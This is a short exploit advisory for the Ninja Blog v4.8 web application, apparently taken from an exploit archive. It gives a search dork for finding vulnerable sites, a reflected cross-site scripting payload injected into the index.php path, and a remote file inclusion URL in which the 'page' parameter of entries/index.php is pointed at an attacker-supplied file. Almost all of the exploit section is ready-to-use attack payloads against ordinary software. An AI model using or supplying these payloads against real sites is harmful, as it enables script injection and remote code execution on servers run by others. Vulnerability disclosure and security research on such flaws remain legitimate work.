Ninja Blog v4.8 Multiple Vulnerabilities

========================================
Ninja Blog v4.8 Multiple Vulnerabilities
========================================

========================================================================================                 
| # Title    : Ninja Blog v4.8 Multiple Vulnerabilities                 
| # Author   : indoushka    
| # Total alerts found : 2                                               
|                High  : 1                                                                      
|              Medium  : 1   
| # Dork     : Powered by Ninja Designs This is a port of WordPress                                   
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Multi                                                                    
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- XSS
 
http://server/ninjablog4.8/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
 2- RFI
  
 http://server/ninjablog4.8/entries/index.php?page=[EV!L]



#  0day.today [2018-04-10]  #